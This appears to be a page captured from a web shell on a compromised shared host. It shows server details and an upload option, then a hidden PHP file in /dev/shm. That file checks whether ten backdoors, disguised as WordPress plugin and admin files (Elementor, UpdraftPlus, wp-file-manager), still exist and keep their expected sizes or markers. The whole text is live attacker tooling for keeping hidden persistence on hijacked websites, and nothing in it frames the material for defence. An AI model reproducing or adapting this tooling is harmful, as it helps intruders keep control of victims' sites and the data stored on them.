HEX
Server: LiteSpeed
System: Linux premium193.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: unerbbkm (1029)
PHP: 8.1.33
Disabled: NONE
Upload Files
File: //dev/shm/.itm
<?php   $r = '/home/ninjuqtk/mac.techtorev.com'; $x = ["/wp-content/plugins/elementor-pro/modules/theme-builder/views/theme-support-header.php"=>"bd@@192835@@17",
"/wp-content/plugins/wp-file-manager/classes/files-backup.php"=>"bd@@192849@@system_core",
"/wp-admin/network/profile.php"=>"bd@@192853@@17",
"/JTGG/includes/class-wp-automatic-updater.php"=>"bd@@192858@@89",
"/wp-content/plugins/updraftplus/central/bootstrap.php"=>"bd@@192886@@28",
"/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Binary/False.php"=>"bd@@192893@@677",
"/wp-content/plugins/updraftplus/vendor/guzzle/guzzle/src/Guzzle/Http/QueryAggregator/olympus.php"=>"bd@@192898@@660",
"/wp-content/plugins/elementor/app/modules/import-export/runners/export/export.runner.php"=>"bd@@192902@@717",
"/wp-content/plugins/elementor-pro/vendor_prefixed/php-di/php-di/src/Invoker/UnitConverter.php"=>"bd@@192903@@560",
"/wp-content/plugins/elementor/assets/js/packages/schema/install.php"=>"bd@@192906@@626"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');